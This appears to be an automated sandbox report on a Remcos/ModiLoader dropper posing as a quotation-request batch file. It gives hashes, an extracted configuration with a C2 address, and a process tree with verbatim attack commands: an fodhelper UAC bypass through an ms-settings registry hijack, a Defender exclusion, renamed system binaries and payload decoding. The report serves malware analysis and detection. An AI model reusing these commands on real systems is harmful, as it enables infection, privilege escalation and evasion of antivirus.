Analysis
max time kernel: 149s
max time network: 154s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted: 04-04-2024 07:08

Static task: static1

Behavioral task: behavioral1
Sample: PODUCT CATALOGUE REQUEST FOR QOUTATIONSTORE.bat
Resource: win7-20240221-en

Behavioral task: behavioral2
Sample: PODUCT CATALOGUE REQUEST FOR QOUTATIONSTORE.bat
Resource: win10v2004-20240226-en
General
Target: PODUCT CATALOGUE REQUEST FOR QOUTATIONSTORE.bat
Size: 4.4MB
MD5: a9f2c8cc828e683395e9a804c120021e
SHA1: 6b1f7e910df1792b94690045d3de345cff297ff3
SHA256: c91aecc289ef01ff1262a274a65124f7a0d0cdf26308de625ce64231c7aa77d1
SHA512: c0e6d23b0ba6bc4255938d8b14b563100068e25ab2d9c5e5e9632683c6b1bd28f8fc32b4f2b790400b66977b24f0ff574b2025a7fdee7e968c08d975ff1c227d
SSDEEP: 49152:xOp5wZlcwP4QJpMoD8cGL2tojFdpjyPHKbfS4b0umx0TwKi3K6lflLE/B2t3mTss:0
Malware Config
Extracted (remcos)
RemoteHost: 192.3.216.139:44800
audio_folder: MicRecords
audio_record_time: 5
connect_delay: 0
connect_interval: 1
copy_file: remcos.exe
copy_folder: Remcos
delete_file: false
hide_file: false
hide_keylog_file: false
install_flag: false
keylog_crypt: false
keylog_file: logs.dat
keylog_flag: false
keylog_folder: remcos
mouse_option: false
mutex: Rmc-EP05ZF
screenshot_crypt: false
screenshot_flag: false
screenshot_folder: Screenshots
screenshot_path: %AppData%
screenshot_time: 10
take_screenshot_option: false
take_screenshot_time: 5
Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

ModiLoader Second Stage (1 IoC)
Processes:
resource: behavioral2/memory/5096-56-0x00000000040C0000-0x00000000050C0000-memory.dmp; yara_rule: modiloader_stage2

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
Processes: xkn.exe
description: Key value queried; ioc: \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation; process: xkn.exe

Executes dropped EXE (16 IoCs)
Processes: alpha.exe, xkn.exe, kn.exe, Lewxa.com
pid   process
3336  alpha.exe
4176  alpha.exe
408   alpha.exe
4900  xkn.exe
4968  alpha.exe
4032  alpha.exe
4392  kn.exe
3800  alpha.exe
5084  kn.exe
5096  Lewxa.com
5052  alpha.exe
3332  alpha.exe
4320  alpha.exe
4628  alpha.exe
3296  alpha.exe
4276  alpha.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Kills process with taskkill (2 IoCs)
Processes: taskkill.exe
pid   process
1688  taskkill.exe
384   taskkill.exe

Modifies registry class (5 IoCs)
Processes: reg.exe
description: Key created; ioc: \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\ms-settings\shell; process: reg.exe
description: Key created; ioc: \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\ms-settings\shell\open; process: reg.exe
description: Set value (str); ioc: \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\\Users "; process: reg.exe
description: Key created; ioc: \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\ms-settings\shell\open\command; process: reg.exe
description: Key created; ioc: \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\ms-settings; process: reg.exe

Modifies registry key (1 TTP, 1 IoC)

Script User-Agent (1 IoC)
Uses user-agent string associated with script host/environment.
Processes:
description: HTTP User-Agent header; flow: 25; ioc: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses (2 IoCs)
Processes: xkn.exe
pid   process
4900  xkn.exe
4900  xkn.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes: xkn.exe, taskkill.exe
description               pid   process
Token: SeDebugPrivilege   4900  xkn.exe
Token: SeDebugPrivilege   1688  taskkill.exe
Token: SeDebugPrivilege   384   taskkill.exe

Suspicious use of FindShellTrayWindow (1 IoC)
Processes: Lewxa.com
pid   process
5096  Lewxa.com

Suspicious use of SendNotifyMessage (1 IoC)
Processes: Lewxa.com
pid   process
5096  Lewxa.com

Suspicious use of WriteProcessMemory (49 IoCs)
Processes: cmd.exe, alpha.exe, xkn.exe
description                        pid   process    target process
PID 3728 wrote to memory of 2836   3728  cmd.exe    cmd.exe
PID 3728 wrote to memory of 2836   3728  cmd.exe    cmd.exe
PID 2836 wrote to memory of 4528   2836  cmd.exe    extrac32.exe
PID 2836 wrote to memory of 4528   2836  cmd.exe    extrac32.exe
PID 3728 wrote to memory of 3336   3728  cmd.exe    alpha.exe
PID 3728 wrote to memory of 3336   3728  cmd.exe    alpha.exe
PID 3336 wrote to memory of 2908   3336  alpha.exe  extrac32.exe
PID 3336 wrote to memory of 2908   3336  alpha.exe  extrac32.exe
PID 3728 wrote to memory of 4176   3728  cmd.exe    alpha.exe
PID 3728 wrote to memory of 4176   3728  cmd.exe    alpha.exe
PID 4176 wrote to memory of 4824   4176  alpha.exe  extrac32.exe
PID 4176 wrote to memory of 4824   4176  alpha.exe  extrac32.exe
PID 3728 wrote to memory of 408    3728  cmd.exe    alpha.exe
PID 3728 wrote to memory of 408    3728  cmd.exe    alpha.exe
PID 408 wrote to memory of 4900    408   alpha.exe  xkn.exe
PID 408 wrote to memory of 4900    408   alpha.exe  xkn.exe
PID 4900 wrote to memory of 4968   4900  xkn.exe    alpha.exe
PID 4900 wrote to memory of 4968   4900  xkn.exe    alpha.exe
PID 4968 wrote to memory of 5028   4968  alpha.exe  reg.exe
PID 4968 wrote to memory of 5028   4968  alpha.exe  reg.exe
PID 4900 wrote to memory of 2656   4900  xkn.exe    fodhelper.exe
PID 4900 wrote to memory of 2656   4900  xkn.exe    fodhelper.exe
PID 3728 wrote to memory of 4032   3728  cmd.exe    alpha.exe
PID 3728 wrote to memory of 4032   3728  cmd.exe    alpha.exe
PID 4032 wrote to memory of 4392   4032  alpha.exe  kn.exe
PID 4032 wrote to memory of 4392   4032  alpha.exe  kn.exe
PID 3728 wrote to memory of 3800   3728  cmd.exe    alpha.exe
PID 3728 wrote to memory of 3800   3728  cmd.exe    alpha.exe
PID 3800 wrote to memory of 5084   3800  alpha.exe  kn.exe
PID 3800 wrote to memory of 5084   3800  alpha.exe  kn.exe
PID 3728 wrote to memory of 5096   3728  cmd.exe    Lewxa.com
PID 3728 wrote to memory of 5096   3728  cmd.exe    Lewxa.com
PID 3728 wrote to memory of 5096   3728  cmd.exe    Lewxa.com
PID 3728 wrote to memory of 5052   3728  cmd.exe    alpha.exe
PID 3728 wrote to memory of 5052   3728  cmd.exe    alpha.exe
PID 3728 wrote to memory of 3332   3728  cmd.exe    alpha.exe
PID 3728 wrote to memory of 3332   3728  cmd.exe    alpha.exe
PID 3728 wrote to memory of 4320   3728  cmd.exe    alpha.exe
PID 3728 wrote to memory of 4320   3728  cmd.exe    alpha.exe
PID 3728 wrote to memory of 4628   3728  cmd.exe    alpha.exe
PID 3728 wrote to memory of 4628   3728  cmd.exe    alpha.exe
PID 3728 wrote to memory of 3296   3728  cmd.exe    alpha.exe
PID 3728 wrote to memory of 3296   3728  cmd.exe    alpha.exe
PID 3296 wrote to memory of 1688   3296  alpha.exe  taskkill.exe
PID 3296 wrote to memory of 1688   3296  alpha.exe  taskkill.exe
PID 3728 wrote to memory of 4276   3728  cmd.exe    alpha.exe
PID 3728 wrote to memory of 4276   3728  cmd.exe    alpha.exe
PID 4276 wrote to memory of 384    4276  alpha.exe  taskkill.exe
PID 4276 wrote to memory of 384    4276  alpha.exe  taskkill.exe
Processes
(process tree; each entry gives the image path, its command line, and the signatures it triggered; children are indented under their parent)

C:\Windows\system32\cmd.exe
  command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PODUCT CATALOGUE REQUEST FOR QOUTATIONSTORE.bat"
  - Suspicious use of WriteProcessMemory

  C:\Windows\system32\cmd.exe
    command line: cmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\extrac32.exe
      command line: extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe

  C:\Users\Public\alpha.exe
    command line: C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\extrac32.exe
      command line: extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe

  C:\Users\Public\alpha.exe
    command line: C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\extrac32.exe
      command line: extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

  C:\Users\Public\alpha.exe
    command line: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory

    C:\Users\Public\xkn.exe
      command line: C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
      - Checks computer location settings
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Users\Public\alpha.exe
        command line: "C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\reg.exe
          command line: reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
          - Modifies registry class
          - Modifies registry key

      C:\Windows\system32\fodhelper.exe
        command line: "C:\Windows\system32\fodhelper.exe"

  C:\Users\Public\alpha.exe
    command line: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PODUCT CATALOGUE REQUEST FOR QOUTATIONSTORE.bat" "C:\\Users\\Public\\Lewxa.txt" 9
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory

    C:\Users\Public\kn.exe
      command line: C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PODUCT CATALOGUE REQUEST FOR QOUTATIONSTORE.bat" "C:\\Users\\Public\\Lewxa.txt" 9
      - Executes dropped EXE

  C:\Users\Public\alpha.exe
    command line: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory

    C:\Users\Public\kn.exe
      command line: C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
      - Executes dropped EXE

  C:\Users\Public\Libraries\Lewxa.com
    command line: C:\\Users\\Public\\Libraries\\Lewxa.com
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage

  C:\Users\Public\alpha.exe
    command line: C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S
    - Executes dropped EXE

  C:\Users\Public\alpha.exe
    command line: C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S
    - Executes dropped EXE

  C:\Users\Public\alpha.exe
    command line: C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S
    - Executes dropped EXE

  C:\Users\Public\alpha.exe
    command line: C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
    - Executes dropped EXE

  C:\Users\Public\alpha.exe
    command line: C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\taskkill.exe
      command line: taskkill /F /IM SystemSettings.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken

  C:\Users\Public\alpha.exe
    command line: C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\taskkill.exe
      command line: taskkill /F /IM SystemSettingsAdminFlows.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\SystemSettingsAdminFlows.exe
  command line: "C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pydormqv.52z.ps1
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Public\Lewxa.txt
Filesize: 3.1MB
MD5: aecbd8ff910c38b1772994a46cf4dcee
SHA1: 96e1b7e276e7b19150c259a344e45b9fa04fac43
SHA256: f29aff3e41afb8bdc6aeffbb4dc0f0083a7851a4fae1ef39a44bf72d7ede6c33
SHA512: 2919015e969612462b2d5b91e1bfa4ec92277f065628e3b5fc6126974203bd490ab89809f14951ac0a5e9d888dbde98af1ebb3900318fa6d718fd04e89d36d18

C:\Users\Public\Libraries\Lewxa.com
Filesize: 1.5MB
MD5: 6babecb95e226aef5eef6f80111e04de
SHA1: f2974245b3391f9be136fdf76df36cc5ad0bed2d
SHA256: a561b2ad4fea4284042c99132d49d651f3d409cc41dc6e950dc85a16ae3934a0
SHA512: 109d9814b12c61c9579395317dc54a6a0092b3ec1b54d4eab9c3489ffe11971e977f8676f44886e46299bbbf49407e33e02642a0ec151144a3dc72b1a13e0949

C:\Users\Public\alpha.exe
Filesize: 283KB
MD5: 8a2122e8162dbef04694b9c3e0b6cdee
SHA1: f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256: b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA512: 99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

C:\Users\Public\kn.exe
Filesize: 1.6MB
MD5: bd8d9943a9b1def98eb83e0fa48796c2
SHA1: 70e89852f023ab7cde0173eda1208dbb580f1e4f
SHA256: 8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2
SHA512: 95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b

C:\Users\Public\xkn.exe
Filesize: 442KB
MD5: 04029e121a0cfa5991749937dd22a1d9
SHA1: f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA256: 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA512: 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Memory dumps (filesize per dump):
memory/4900-17-0x0000026F6DD00000-0x0000026F6DD22000-memory.dmp  136KB
memory/4900-27-0x00007FFDCE690000-0x00007FFDCF151000-memory.dmp  10.8MB
memory/4900-29-0x0000026F6DD60000-0x0000026F6DD70000-memory.dmp  64KB
memory/4900-28-0x0000026F6DD60000-0x0000026F6DD70000-memory.dmp  64KB
memory/4900-32-0x0000026F6DD60000-0x0000026F6DD70000-memory.dmp  64KB
memory/4900-35-0x00007FFDCE690000-0x00007FFDCF151000-memory.dmp  10.8MB
memory/5096-56-0x00000000040C0000-0x00000000050C0000-memory.dmp  16.0MB
memory/5096-66-0x0000000016220000-0x0000000017220000-memory.dmp  16.0MB
memory/5096-48-0x0000000000A90000-0x0000000000A91000-memory.dmp  4KB
memory/5096-60-0x0000000000400000-0x0000000000596000-memory.dmp  1.6MB
memory/5096-61-0x0000000016220000-0x0000000017220000-memory.dmp  16.0MB
memory/5096-62-0x0000000016220000-0x0000000017220000-memory.dmp  16.0MB
memory/5096-63-0x0000000016220000-0x0000000017220000-memory.dmp  16.0MB
memory/5096-64-0x0000000016220000-0x0000000017220000-memory.dmp  16.0MB
memory/5096-65-0x0000000016220000-0x0000000017220000-memory.dmp  16.0MB
memory/5096-53-0x00000000040C0000-0x00000000050C0000-memory.dmp  16.0MB
memory/5096-69-0x0000000016220000-0x0000000017220000-memory.dmp  16.0MB
memory/5096-71-0x0000000016220000-0x0000000017220000-memory.dmp  16.0MB
memory/5096-74-0x0000000016220000-0x0000000017220000-memory.dmp  16.0MB
memory/5096-75-0x0000000016220000-0x0000000017220000-memory.dmp  16.0MB
memory/5096-80-0x0000000016220000-0x0000000017220000-memory.dmp  16.0MB
memory/5096-84-0x0000000016220000-0x0000000017220000-memory.dmp  16.0MB
memory/5096-90-0x0000000016220000-0x0000000017220000-memory.dmp  16.0MB
memory/5096-91-0x0000000016220000-0x0000000017220000-memory.dmp  16.0MB